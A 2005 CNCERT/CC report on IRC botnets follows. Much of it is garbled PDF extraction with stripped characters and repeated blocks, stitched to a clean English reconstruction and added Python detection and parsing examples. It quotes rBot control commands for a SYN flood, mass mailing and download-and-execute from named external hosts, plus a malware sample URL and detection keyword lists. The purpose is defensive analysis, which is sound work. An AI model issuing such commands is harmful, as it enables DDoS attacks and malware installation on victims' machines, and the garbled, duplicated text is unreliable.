Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml

[15] httpwwwsymanteccompressindex_2004html

[16] Tom Vogt Simulating and optimising worm propagation algorithms

wwwsecurityfocuscomguest24046 20039

This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only

Page 4: Worm DDos Spam - SecurityCN.net · CNCERT/CC CNCERT/CC CNCERTCC_TR_2005-001(Draft) Worm DDos Spam Phishing Spyware Botnet [1] Bot DDos DDos Bot: ±Robo Bot

Bot (Worm) Bot

Bot 2003 Deloader Bot

Bot Bot

Bot

Bot

Trojan Horse Bot

IP Bot

IRC DCC

Bot

Spyware

2

Bot

trojan horse

worm

Spyware

virus

2

1

2001

[16]

Botnet

2004 3 19

Witty Witty 10

110 20 50

2

DDoS DDoS

DDoS

DDoS

DDoS DDoS

3

IP CERT MessageLab [9][10] DDoS

4

5

6

socks

IRC IRC Bot

1 IRC Internet Relay Chat

IRC RFC1459 IRC Channel

IRC

IRC IRC IRC

irc263net IP IP IRC Server

A IP1 B IP2 A B

IRC Server irc263net

IRC

IRC TCP 6667 6000 7000

IRC Bot 443 8000 500

IRC

2 IRC Bot

IRC Bot IRC IRC

HIRC mIRC 1 IRC Bot IRC

2 IRC Bot

IRC Bot IRC GT bot

IRC mIRC mIRC

mIRC mIRC GT bot

mIRC

IRC Bot IRC IRC Bot

IRC

1 NICK USER Bot IRC

2 PASS IRC PASS TCP

3 JOIN Channel key key

3) MODE IRC Bot

4) PING PONG IRC IRC

PING PONG PING

IRC IRC Bot

PINGPONG IRC Bot

5) PRIVMSG Channel msg Bot

6) DCC SEND Bot

3

(Bot) IRC

P2P

IRC DCC 1987

2004 CNCERTCC

1

DDos

-gtPRIVMSG rbot syn wwwxxxcom

80 200 3600n

rbot syn syn flood 200

wwwxxxcom 80 syn 3600 -gt bot CampC S

lt-

2

(Phishing)

DNS

host pharming

ISP

redirector

[6]

Phi s h i ng

3 (Spam)

Spammer

blacklist

1

-gtPRIVMSG rbot mm httpwww recptcomfetchphp httpwwwmailnetemailhtml

mm mass mail httpwww recptcom

fetchphp php

httpwwwmailnetemailhtml

ip spammer

2 socks v4v5 Open Relay

Spammer Open Proxy Open Mail Relay

Open Relay Server Open Mail Relay Spammer

Spammer Proxy Open Relay Proxy

Open Relay Spammer Proxy Open Relay

Spammer

socks v4 Smtp Open Relay

socks v4 Open Relay

IP ISP IP

3

email AgoBot

harvestemails

4 (Spyware)

Spyware Keylogger

-gtPRIVMSG rBot Download httpwwwelitecodersnetupdateexe crBotexe 1

httpwwwelitecodersnet updateexe crBotexe 1

Windows Bot

Bot bot

PINGPONG bot

IRC TCP 6667 CNCERTCC

bot bot

cmdexe plusmnnetst at an IP

IP

135 445

fportexe netstat

11

bot

CD-Key

bot

bot ie

ie bot rootkit [2]

bot rootkit

rootkit bot

CNCERTCC

1 honeypot bot

2) IDS

3

IRC

1 Honeypot

bot bot Honeywall

bot dnsip

windows 25 [11]

bot bot

[3] honeynet project 2004 11

2005 3 1 HoneyWall 1 mwcollect[8]

180

30 5500 800 2004

11 2005 1 406 Ddos 179 [4]

2

IRC IDS IRC Bot JOIN PASS

PRIVMSG NICK TOPIC NOTICE

IRC TCP

udp syn ddos http download exe update scan exploit login

logon advscan lsass dcom beagle dameware

3

1 bot(fast joining bots)

bots IRC

IRC

2) bot(Long standing connection)

bots

3) bot(not talkative)

Bots bot pingpong

DdoSVax [5] Bot

4

1

IDS bot

bot bot

bot bot

IDS IRC

2

IDS IRC

Bot IRC IRC RFC IDS

bot

IRC IRC

3

IDS

bot

IDS

socks v4

Server plusmnTOPI rBot advscan lsass 200 5 0 -r s

a

-gtTOPIC rBot advscan lsass 200 5 0 -r sn

b

-gtTOPIC rBot advscan lsass 200 5 0 -r sn

c) Botnet bot

lt-ControllerNICKControllerUSERsocks(HOST or IP) TOPIC rBot advscan lsass

200 5 0 -r srn

IDS bot

IP IP IP IP

IDS 3 1 3

1 3 1

1 IDS

IRC

1

IP port ( )

2

channel ( )

3 Host

login pass

host bot

4 Bot

login update download uninstall

Botnet

1

bot

1

bot

bot

bot

2

bot

bot bot

bot

2

IP

bot

3 bot

2005 CNCERTCC

Bot

1 IRC

IRC bot

bot bot

IRC

Serv1 Serv2 shy Ser v N

IRC Serv1 Serv1 IP Serv2

Serv3 Serv2 Nick_Serv1

Serv2 Serv1 IRC ServX Nick_Serv3

Nick_Serv6 Serv3 Serv6 ServX

2 TOPIC

TOPIC IRC

bot TOPIC

TOPIC 1)advscan lsass 200 5 0 -r s

LSASS 200 5 -r = random

-s = silent

2)httpupdate httpserverrBotexe crBotexe 1

server rBotexe c 1

CNCERTCC TOPIC Bot

TOPIC degJ OI N ne wchanne

TOPIC PRIVMSG

bot bot bot TOPIC

TOPIC IP IP

IP

3

bot

bot

Bot

login logon auth

bot bot nick

host rBot v065

1

-gtPRIVMSG rbot login password sn

IP

2 bot

lt-ControllerNICKControllerUSERhost PRIVMSG rbot login password -srn

1 2

IP Bot

host

IP

lt-ControllerNICKControllerUSER10101010 PRIVMSG rbot login password -srn

10101010 login

3 rBot NICK

ControllerNICK USER(ControllerUSER) host (login) (password

-s) rBot

user host rBot

host net com net

com rBot host com net

()

4 -s silent bot

-gtPRIVMSG rbot password acceptedn

bot

Windows Windows

bot 90

[7]

Windows XP

11

Bot

Symantec 2004 1 6 Bot

2000 30000 [15] MessageLabs 2004

70 [10] CipherTrust 2005 4 5

15 17 20-15

Bot [12]

IRC Agobot

PhatBot P2P

IRC P2P

2005 rootkit bot(rBot )

rootkit bot bot

2004

CNCERTCC Bot

IRC

P2P P2P bot

Phatbot[13] sinit[14]

Phatbot Gnutella Guutella cache servers server peer

peer TCP 4387 Gnutella Phatbot

waste waste Phatbot waste

md5

Phatbot

sinit P2P Peer

dll dll sinit

bot

CNCERTCC bot

httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe

IP 10001

sniffer

cmdexe

cgtnetstat anrn

TCP 0000135 00000 LISTENING

TCP 0000445 00000 LISTENING

TCP 100011150 203151217856667 ESTABLISHED

TCP 100011616 20210832137445 FIN_WAIT_1

TCP 100011631 20210832147445 FIN_WAIT_1

TCP 100011714 20210832190445 FIN_WAIT_1

TCP 100011727 20210832165445 FIN_WAIT_1

TCP 100012253 20210834211445 TIME_WAIT

TCP 100012904 2021083791445 TIME_WAIT

TCP 100013476 20210839151445 TIME_WAIT

TCP 100013478 20210839153445 TIME_WAIT

TCP 100013480 20210839155445 TIME_WAIT

TCP 100013486 20210839151445 TIME_WAIT

TCP 100013487 20210839153445 TIME_WAIT

TCP 100013488 20210839155445 TIME_WAIT

TCP 100013673 2021084082445 TIME_WAIT

TCP 100013674 2021084082445 TIME_WAIT

TCP 100014953 2021084520445 TIME_WAIT

TCP 100014955 2021084520445 TIME_WAIT

TCP 100014959 2021084523445 TIME_WAIT

TCP 100014961 2021084523445 TIME_WAIT

UDP 000069 UDP 69

UDP 0000445

UDP 10001137

UDP 10001138

fportexe

C gtfport | find 1150 1150 6667

1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe

Cgtfport | find 69

1048 wininit -gt 69 UDP CWINNTsystem32wininitexe

6667 69 wininitexe rBot

wininitexe sysinternals FileMon

bot sysinternals autoruns

rBot

HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe

HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe

Wininit 445 6667

IP

20315121785 6667

TCP

Wininit IRC

-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )

-gtJOIN xdcc dropitrn ( xdcc dropit)

lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (

advscan asn1smb )

-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0

min using 100 threadsrn( )

CNCERT/CC 2005

References

[1] 2005.4
[2] Paul F. Roberts, "Malicious Bots Hide Using Rootkit Code", eWeek, May 17, 2005. http://www.eweek.com/article2/0,1759,1816972,00.asp
[3] The Honeynet Project, "Know your Enemy: Tracking Botnets".
[4] Felix C. Freiling, Thorsten Holz and Georg Wicherski, "Botnet Tracking: Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks". http://www.honeynet.org/papers/individual/
[5] Jonas Bolliger and Thomas Kaufmann, "Detecting Bots in Internet Relay Chat Systems". www.tik.ee.ethz.ch/~ddosvax/sada/sa-2004-29/task.pdf
[6] The Honeynet Project, "Know your Enemy: Phishing". http://www.honeynet.org, 16th May 2005.
[7] Helen J. Wang, Chuanxiong Guo, Daniel R. Simon and Alf Zugenmaier, "Shield: First-Line Worm Defense", Microsoft Research, ACM SIGCOMM 2004.
[8] http://www.mwcollect.org
[9] http://www.cert.org
[10] http://www.messagelab.co.uk
[11] Joe Stewart, "Emerging Threats: From Discovery to Protection". www.sdissa.org/downloads/emergingthreats-public.pdf
[12] http://www.ciphertrust.com/resources/statistics/zombie.php
[13] LURHQ Threat Intelligence Group, "Phatbot Trojan Analysis". http://www.lurhq.com/phatbot.html
[14] LURHQ Threat Intelligence Group, "Sinit P2P Trojan Analysis". http://www.lurhq.com/sinit.html
[15] http://www.symantec.com/press/index_2004.html
[16] Tom Vogt, "Simulating and optimising worm propagation algorithms". www.securityfocus.com/guest/24046, 2003.9


Bot abuse observed by CNCERT/CC in 2004

1) DDoS

The controller types one line into the channel and every bot that reads it attacks:

  -> PRIVMSG #rbot :.syn www.xxx.com 80 200 3600\n

#rbot is the channel, .syn selects a SYN flood, www.xxx.com port 80 is the target, and the numeric arguments are 200 and 3600, the latter the duration in seconds. Here "->" marks a line sent by a client (controller or bot) to the C&C server and "<-" a line the client receives from the server.

2) Phishing

Bots serve phishing in two ways: by manipulating name resolution, either the hosts file on the infected machine or the DNS lookups that would normally be answered by the ISP's servers, so that a bank's name resolves to the attacker's site (pharming); and by acting as redirectors, throwaway front ends that forward victims' connections to the real phishing server so that its address is never exposed [6].

3) Spam

Spammers value bots because mail sent from thousands of ever-changing addresses cannot be stopped by blacklists. Three uses were seen:

1) Mass mailing from the bot itself:

  -> PRIVMSG #rbot :.mm http://www.recpt.com/fetch.php http://www.mail.net/email.html

.mm is the mass-mail command. The bot fetches the recipient list from the PHP script at http://www.recpt.com/fetch.php and the message from http://www.mail.net/email.html, then delivers the mail from its own IP address; the spammer's address appears nowhere.

2) SOCKS v4/v5 proxy and open relay. Spammers traditionally hide behind open proxies and open mail relays. A bot can act as either: it runs a SOCKS v4 proxy through which the spammer's SMTP session is forwarded to an open relay, or it is itself the open relay. Each hop adds an address belonging to some other ISP's customer, so the address the receiving mail server sees is that of a bot, never that of the spammer.

3) Address harvesting: Agobot's harvest.emails command collects e-mail addresses from the infected machine for the spammer's lists.

4) Spyware

A bot is also a loader. On command it downloads and runs further programs, a keylogger or other spyware included:

  -> PRIVMSG #rBot :.download http://www.elitecoders.net/update.exe c:\rBot.exe 1

Fetch update.exe from http://www.elitecoders.net, save it as c:\rBot.exe, and (the trailing 1) execute it.

Recognising a bot on a Windows host

A bot keeps a permanent IRC session to its C&C server, answering the server's PING with PONG to keep it alive; in the cases handled by CNCERT/CC the session was usually on TCP 6667. Start with netstat -an from cmd.exe and look at the foreign addresses: an ESTABLISHED connection to an unfamiliar address on 6667, alongside a stream of short-lived outbound connections to ports 135 and 445 of consecutive addresses, is the signature of a bot scanning for new victims. fport.exe then ties each netstat entry to the process that owns it.

Other signs: CD keys of installed games and software are harvested, and Internet Explorer's settings are tampered with. Note the caveat in [2]: newer bots carry rootkit code that hides the bot's process, files and connections from tools run on the infected system itself, so a clean netstat or fport listing does not prove the host is clean; check from the network side (sniffer, flow records) as well.

How CNCERT/CC detects botnets

Three approaches are used: 1) honeypots, which capture the bot binary and its C&C parameters; 2) IDS signatures on IRC traffic; 3) analysis of the traffic characteristics of IRC bots.

1) Honeypots

A honeypot is left to be infected; the bot's traffic is then recorded through a Honeywall, which yields the C&C server's DNS name or IP address and port, the channel and its password. Exposure is enough: an unpatched Windows host on the Internet is compromised within minutes (25 by the figure in [11]). The Honeynet Project [3] ran this approach from November 2004 to March 2005 with a single Honeywall and mwcollect [8], tracked more than 180 botnets (sizes cited: 30, 800 and 5,500 hosts), and between November 2004 and January 2005 observed 406 DDoS attacks against 179 distinct targets [4].

2) IDS signatures on IRC

Since the bot's control channel is IRC, an IDS can match the IRC commands a bot exchanges with its server (JOIN, PASS, PRIVMSG, NICK, TOPIC, NOTICE) regardless of TCP port, and match the vocabulary of bot commands carried in PRIVMSG and TOPIC payloads: udp, syn, ddos, http, download, .exe, update, scan, exploit, login, logon, advscan, lsass, dcom, beagle, dameware (the last four are the names of rBot's exploit modules).

3) Traffic characteristics of IRC bots

Three behaviours separate bots from human IRC users:

1) fast joining bots: many clients join the same channel within a short time;
2) long standing connection: a bot stays connected for days, a person for hours at most;
3) not talkative: bots say almost nothing; apart from the occasional command and report, the connection carries only PING/PONG keepalives.

ETH Zurich's DDoSVax project [5] detects bots in IRC traffic from such characteristics.
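An added example, not from the report: the three traffic characteristics above and the IDS vocabulary from point 2) turned into a scorer over per-client session records. The record layout, the thresholds (five joins within 60 seconds, 24 hours, fewer than one message per hour) and the sample sessions are constructed for this example; a real deployment would build the records from flow logs or a Honeywall's IRC capture.

```python
"""Score IRC sessions for bot behaviour: fast joining, long-standing
connections, silence, and the bot-command vocabulary in the traffic."""
from collections import defaultdict
from datetime import datetime, timedelta

# Keyword list from the report's IDS signatures, matched case-insensitively.
BOT_KEYWORDS = ("udp", "syn", "ddos", "http", "download", ".exe", "update", "scan",
                "exploit", "login", "logon", "advscan", "lsass", "dcom", "beagle", "dameware")

# Thresholds are assumptions chosen for this example.
FAST_JOIN_WINDOW = timedelta(seconds=60)
FAST_JOIN_MIN_CLIENTS = 5
LONG_SESSION = timedelta(hours=24)
SILENT_MSGS_PER_HOUR = 1.0

T0 = datetime(2005, 7, 9, 9, 0, 0)


def bot_session(i):
    """Constructed record: a bot joining #xdcc, staying three days, reporting once."""
    return {"client": f"10.0.1.{i}", "channel": "#xdcc",
            "join": T0 + timedelta(seconds=5 * i), "leave": T0 + timedelta(days=3),
            "sent": ["[SCAN]: Sequential Port Scan started on 10.0.0.0:445"],
            "received": [".advscan lsass 200 5 0 -r -s"]}


# Constructed sample: six bots and one human chatting in another channel.
SESSIONS = [bot_session(i) for i in range(6)] + [{
    "client": "192.0.2.7", "channel": "#linux",
    "join": T0 + timedelta(minutes=3), "leave": T0 + timedelta(hours=2),
    "sent": ["anyone tried the new kernel?"] * 40,
    "received": ["works for me"]}]


def fast_joiners(sessions):
    """Clients that joined a channel together with at least N others within the window."""
    flagged = set()
    by_channel = defaultdict(list)
    for s in sessions:
        by_channel[s["channel"]].append(s)
    for members in by_channel.values():
        members.sort(key=lambda s: s["join"])
        for i, first in enumerate(members):
            burst = [m for m in members[i:] if m["join"] - first["join"] <= FAST_JOIN_WINDOW]
            if len(burst) >= FAST_JOIN_MIN_CLIENTS:
                flagged.update(m["client"] for m in burst)
    return flagged


def keyword_hits(texts):
    """Number of (text, keyword) matches against the bot vocabulary."""
    return sum(1 for t in texts for k in BOT_KEYWORDS if k in t.lower())


def score_sessions(sessions):
    """Per client: the three behavioural flags, keyword count, and a 0-4 score."""
    joiners = fast_joiners(sessions)
    result = {}
    for s in sessions:
        duration = s["leave"] - s["join"]
        hours = max(duration.total_seconds() / 3600.0, 1e-9)
        flags = {
            "fast_join": s["client"] in joiners,
            "long_session": duration >= LONG_SESSION,
            "not_talkative": len(s["sent"]) / hours < SILENT_MSGS_PER_HOUR,
            "keywords": keyword_hits(s["sent"] + s["received"]),
        }
        flags["score"] = (int(flags["fast_join"]) + int(flags["long_session"])
                          + int(flags["not_talkative"]) + int(flags["keywords"] > 0))
        result[s["client"]] = flags
    return result


if __name__ == "__main__":
    for client, flags in score_sessions(SESSIONS).items():
        print(client, flags)
```

The behavioural flags need no payload inspection and survive a bot that moves to a non-standard port or renames its commands; the keyword count is the cheap, brittle signal that confirms them.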

4) Limits of IDS detection

1) An IDS only sees traffic that crosses its sensor: it finds the infected hosts in the monitored network and the C&C server they talk to, not the rest of the botnet.
2) An IDS keys on IRC as specified in the RFC; bots that use a modified IRC dialect, another protocol, or encryption are missed.
3) An IDS sees the controller only through whatever the controller hides behind. Controllers typically enter the IRC server through a SOCKS v4 proxy (often another bot), so the address the IDS records is the proxy's.

The same order seen from three vantage points:

  Server: TOPIC #rBot :.advscan lsass 200 5 0 -r -s

a) sent by the controller to the proxy:
  -> TOPIC #rBot :.advscan lsass 200 5 0 -r -s\n
b) sent by the proxy to the IRC server:
  -> TOPIC #rBot :.advscan lsass 200 5 0 -r -s\n
c) received by every bot in the botnet:
  <- :ControllerNICK!ControllerUSER@socks(HOST or IP) TOPIC #rBot :.advscan lsass 200 5 0 -r -s\r\n

An IDS watching infected hosts sees only c): the controller's nick and user name, and the host or IP of the SOCKS proxy. The controller's real IP appears only at a), on the proxy host, so identifying the controller means locating and examining the proxy.

What an IDS alert on bot IRC traffic does yield:

1) the C&C server's IP and port;
2) the channel (and its key);
3) the controller's host mask and the login password, the credentials a bot checks before it obeys;
4) the bot's command set: login, update, download, uninstall and so on.

These four are what botnet tracking needs: with 1) to 3) an analyst can join the channel as a bot and watch the controller's orders; with 4) the bot's own commands can be understood, including the ones that make it update or remove itself.

Changes in bot behaviour seen by CNCERT/CC in 2005

1) Several IRC servers. A bot is no longer bound to one server: it carries a list Serv1, Serv2, ... ServN, connects to Serv1, and falls back to Serv2, Serv3 and so on when Serv1's IP does not answer. The bots' nicks were seen to encode the server they came from (Nick_Serv1, Nick_Serv3, Nick_Serv6 for Serv1, Serv3, Serv6), so that bots from several servers can be gathered on one server ServX and the controller still knows which server each came from. Taking down one IRC server no longer takes down the botnet.

2) Commands in the TOPIC. Instead of sending a PRIVMSG each time, the controller sets the channel TOPIC to the command. Every bot receives the topic in the RPL_TOPIC reply when it joins and executes it, so bots that join later are still ordered and the controller need not be present. Topics seen:

  1) .advscan lsass 200 5 0 -r -s
     scan with the LSASS exploit, 200 threads, 5-second delay, 0 minutes (no time limit); -r = random target addresses, -s = silent (no report to the channel)
  2) .http.update http://server/rBot.exe c:\rBot.exe 1
     download rBot.exe from the server, save it as c:\rBot.exe and (the 1) run it

CNCERT/CC also saw topics of the form "JOIN #newchannel", which move the whole botnet to another channel. Two consequences: IDS signatures must match the command vocabulary in TOPIC (and in the server's 332 reply) as well as in PRIVMSG; and because the topic is held by the server, the command reaches the bot without the controller's IP appearing anywhere in the bot's traffic, only the server's.
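An added example, not from the report: a Python parser for the raw IRC lines in the captured session earlier on this page and for the command strings quoted in the DDoS, spam, spyware and TOPIC examples. It splits each line into prefix, command and parameters, decodes the rBot-style commands (.advscan, .syn, .download/.http.update, .mm, .login) into fields, and records which IRC verb carried them, so the same code covers PRIVMSG, TOPIC and the server's 332 reply. The transcript is assembled from lines quoted on this page; the controller host 10.10.10.10 is the page's placeholder, and the .syn numeric arguments are kept as given rather than interpreted.

```python
"""Parse raw IRC lines from a bot C&C session and decode the rBot-style commands."""

# Constructed transcript: the captured lines from this page plus the TOPIC, login,
# update and DDoS examples, as a bot would receive them (\r\n is part of the protocol).
TRANSCRIPT = [
    "NICK CHN|9148119\r\n",
    "USER autdeoxsnv 0 0 :CHN|9148119\r\n",
    "JOIN #xdcc dropit\r\n",
    ":CHN|9148119!autdeoxsnv@10.0.0.1 332 CHN|9148119 #xdcc :.advscan asn1smb 100 5 0 -b\r\n",
    "PRIVMSG #xdcc :[SCAN] Sequential Port Scan Started On 10.0.0.0:445 within a delay of 5 seconds for 0 min using 100 threads\r\n",
    ":ControllerNICK!ControllerUSER@10.10.10.10 PRIVMSG #rbot :.login password -s\r\n",
    ":ControllerNICK!ControllerUSER@10.10.10.10 TOPIC #rBot :.advscan lsass 200 5 0 -r -s\r\n",
    ":ControllerNICK!ControllerUSER@10.10.10.10 PRIVMSG #rbot :.http.update http://server/rBot.exe c:\\rBot.exe 1\r\n",
    ":ControllerNICK!ControllerUSER@10.10.10.10 PRIVMSG #rbot :.syn www.xxx.com 80 200 3600\r\n",
]


def parse_irc(line):
    """Split '[:prefix ]COMMAND [params] [:trailing]' as RFC 1459 defines it."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, line = line[1:].split(" ", 1)
    trailing = None
    if " :" in line:
        line, trailing = line.split(" :", 1)
    parts = line.split()
    params = parts[1:] + ([trailing] if trailing is not None else [])
    nick = user = host = None
    if prefix and "!" in prefix and "@" in prefix:       # nick!user@host
        nick, rest = prefix.split("!", 1)
        user, host = rest.split("@", 1)
    return {"cmd": parts[0], "params": params, "nick": nick, "user": user, "host": host}


def decode_bot_command(text):
    """Turn an rBot-style command string into fields; None if it is not a command."""
    tokens = text.split()
    if not tokens or not tokens[0].startswith(".") or len(tokens[0]) < 2:
        return None
    name, args = tokens[0][1:].lower(), tokens[1:]
    flags = {a for a in args if a.startswith("-")}
    pos = [a for a in args if not a.startswith("-")]
    if name == "advscan" and len(pos) >= 4:
        return {"command": name, "exploit": pos[0], "threads": int(pos[1]),
                "delay_s": int(pos[2]), "minutes": int(pos[3]),
                "random": "-r" in flags, "silent": "-s" in flags, "local_class_b": "-b" in flags}
    if name == "syn" and len(pos) >= 4:
        return {"command": name, "target": pos[0], "port": int(pos[1]), "args": [int(pos[2]), int(pos[3])]}
    if name in ("download", "http.update") and len(pos) >= 3:
        return {"command": name, "url": pos[0], "save_as": pos[1], "run": pos[2] == "1"}
    if name == "mm" and len(pos) >= 2:
        return {"command": name, "recipients_url": pos[0], "body_url": pos[1]}
    if name in ("login", "logon", "auth") and pos:
        return {"command": name, "password": pos[0], "silent": "-s" in flags}
    return {"command": name, "args": args}          # unknown command: keep it raw


def summarize(lines):
    """Bot nick, channels with keys, and every decoded command with its source and IRC verb."""
    info = {"nick": None, "channels": {}, "commands": []}
    for raw in lines:
        msg = parse_irc(raw)
        if msg["cmd"] == "NICK":
            info["nick"] = msg["params"][0]
        elif msg["cmd"] == "JOIN":
            info["channels"][msg["params"][0]] = msg["params"][1] if len(msg["params"]) > 1 else None
        elif msg["cmd"] in ("332", "TOPIC", "PRIVMSG", "NOTICE") and msg["params"]:
            decoded = decode_bot_command(msg["params"][-1])
            if decoded:
                decoded.update(via=msg["cmd"],
                               channel=msg["params"][-2] if len(msg["params"]) > 1 else None,
                               sender=msg["host"])
                info["commands"].append(decoded)
    return info


if __name__ == "__main__":
    for cmd in summarize(TRANSCRIPT)["commands"]:
        print(cmd)
```

The "sender" field is the host from the prefix, which for a TOPIC or a 332 reply is whatever the server put there; as the vantage-point discussion above shows, that is the proxy's address at best, never a reason to believe the controller has been located.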

3) Controller authentication. A bot obeys only a logged-in controller; the command is login, logon or auth depending on the bot family. Older bots checked the password alone; rBot v0.65 also checks the controller's nick, user name and host against a built-in master list. The exchange:

1) The controller sends the login to the channel:
  -> PRIVMSG #rbot :.login password -s\n
   Nothing in what the controller sends carries its IP.

2) Each bot receives the line with the server-supplied sender prefix:
  <- :ControllerNICK!ControllerUSER@host PRIVMSG #rbot :.login password -s\r\n
   host is whatever the IRC server saw the controller (or its proxy) connect from, an IP address or its reverse name, e.g.
  <- :ControllerNICK!ControllerUSER@10.10.10.10 PRIVMSG #rbot :.login password -s\r\n
   in which case 10.10.10.10 is the address that logged in.

3) rBot takes the NICK (ControllerNICK), USER (ControllerUSER) and host from the prefix, and the password (and -s) from the text, and compares them with its master list. The host check is a wildcard match: a master entry such as *.net accepts any host under .net, one with *.com any host under .com, so how much the host really constrains the login depends on how specific the bot's author made the mask.

4) -s means silent: the bot does not acknowledge the login in the channel. Without it every bot replies in the channel:
  -> PRIVMSG #rbot :Password accepted.\n
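An added example, not rBot's code: the master check described in point 3) written out, with the host compared by wildcard mask as the report describes. The master lists, the password and the host names are constructed for this example; the point it makes is that a mask like *.net admits any .net host that knows the password, while an exact host pins the login down.

```python
"""rBot-style controller authentication: password plus nick/user/host mask."""
from fnmatch import fnmatchcase

# Constructed master lists. rBot v0.65 checks nick, user and host against such a list.
LOOSE_MASTERS = [{"nick": "ControllerNICK", "user": "ControllerUSER", "host": "*.net"}]
STRICT_MASTERS = [{"nick": "ControllerNICK", "user": "ControllerUSER", "host": "c2.example.net"}]
PASSWORD = "password"   # constructed, as in the page's example


def is_master(nick, user, host, masters):
    """True if the sender prefix matches one master entry; masks are shell-style wildcards."""
    return any(fnmatchcase(nick, m["nick"]) and fnmatchcase(user, m["user"])
               and fnmatchcase(host, m["host"]) for m in masters)


def handle_login(nick, user, host, text, masters, password=PASSWORD):
    """Process a '.login <password> [-s]' line as the bot would.

    Returns (accepted, reply): reply is the text the bot would send to the
    channel, or None when the login failed or -s (silent) was given."""
    tokens = text.split()
    if len(tokens) < 2 or tokens[0].lower() not in (".login", ".logon", ".auth"):
        return False, None
    if tokens[1] != password or not is_master(nick, user, host, masters):
        return False, None
    silent = "-s" in tokens[2:]
    return True, None if silent else "Password accepted."


if __name__ == "__main__":
    # Any .net host passes the loose list; only c2.example.net passes the strict one.
    print(handle_login("ControllerNICK", "ControllerUSER", "proxy7.example.net", ".login password", LOOSE_MASTERS))
    print(handle_login("ControllerNICK", "ControllerUSER", "proxy7.example.net", ".login password", STRICT_MASTERS))
```

For a tracker who has recovered the password from a honeypot, the loose mask is what makes it possible to take over a channel from any .net host; for the bot's author it is the trade-off between convenience through proxies and being hijacked.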

Trends

Bots are a Windows phenomenon: over 90% target Windows [7], Windows XP included. The numbers are rising fast. Symantec counted the bots it monitored growing from under 2,000 to more than 30,000 per day in the first half of 2004 [15]; MessageLabs attributed about 70% of the spam it saw in 2004 to bots [10]; CipherTrust's zombie statistics for April and May 2005 put new zombies at 150,000 to 170,000 per day [12].

The bot families are changing too. Agobot is an IRC bot, but its PhatBot variant adds P2P control; the move from IRC to P2P removes the single point of failure that an IRC server represents. In 2005 bots with rootkit code (rBot variants) appeared, hiding the bot on the infected host. The bots CNCERT/CC handled in 2004 were all IRC bots; the P2P bots documented so far are Phatbot [13] and Sinit [14]. Phatbot finds its peers through public Gnutella cache servers, registering itself there as a Gnutella peer; its peers talk on TCP 4387, so the same cache servers can be queried to enumerate Phatbot hosts. Between peers it uses a modified version of the WASTE protocol, with MD5 used in its peer handshake [13]. Sinit builds its own P2P network and distributes code to its peers as DLLs, which each peer loads [14].

Analysis of a captured bot

On 9 July 2005 CNCERT/CC captured a bot sample, rbot.exe, from http://goa-irc.co.uk/wosten/rbot.exe. It was run on an isolated host with the IP address 10.0.0.1, with a sniffer on the same segment, and examined from cmd.exe with netstat -an and fport; the listing, the fport, FileMon and Autoruns results and the sniffed IRC exchange are those reproduced above.

cgtnetstat anrn

TCP 0000135 00000 LISTENING

TCP 0000445 00000 LISTENING

TCP 100011150 203151217856667 ESTABLISHED

TCP 100011616 20210832137445 FIN_WAIT_1

TCP 100011631 20210832147445 FIN_WAIT_1

TCP 100011714 20210832190445 FIN_WAIT_1

TCP 100011727 20210832165445 FIN_WAIT_1

TCP 100012253 20210834211445 TIME_WAIT

TCP 100012904 2021083791445 TIME_WAIT

TCP 100013476 20210839151445 TIME_WAIT

TCP 100013478 20210839153445 TIME_WAIT

TCP 100013480 20210839155445 TIME_WAIT

TCP 100013486 20210839151445 TIME_WAIT

TCP 100013487 20210839153445 TIME_WAIT

TCP 100013488 20210839155445 TIME_WAIT

TCP 100013673 2021084082445 TIME_WAIT

TCP 100013674 2021084082445 TIME_WAIT

TCP 100014953 2021084520445 TIME_WAIT

TCP 100014955 2021084520445 TIME_WAIT

TCP 100014959 2021084523445 TIME_WAIT

TCP 100014961 2021084523445 TIME_WAIT

UDP 000069 UDP 69

UDP 0000445

UDP 10001137

UDP 10001138

fportexe

C gtfport | find 1150 1150 6667

1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe

Cgtfport | find 69

1048 wininit -gt 69 UDP CWINNTsystem32wininitexe

6667 69 wininitexe rBot

wininitexe sysinternals FileMon

bot sysinternals autoruns

rBot

HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe

HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe

Wininit 445 6667

IP

20315121785 6667

TCP

Wininit IRC

-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )

-gtJOIN xdcc dropitrn ( xdcc dropit)

lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (

advscan asn1smb )

-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0

min using 100 threadsrn( )

CNCERTCC 2005

[1]

20054

[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005

httpwwweweekcomarticle201759181697200asp

[3] honeynet project plusmn Kno w your ene my

Tracking Botnet

[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks

Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual

[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann

wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf

[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005

[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier

Microsoft Research ACM SIGCOMM 2004

[8] httpwwwmwcollectorg

[9] httpwwwcertorg

[10] httpwwwmessagelabcouk

[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o

wwwsdissaorgdownloadsemergingthreats-publicpdf

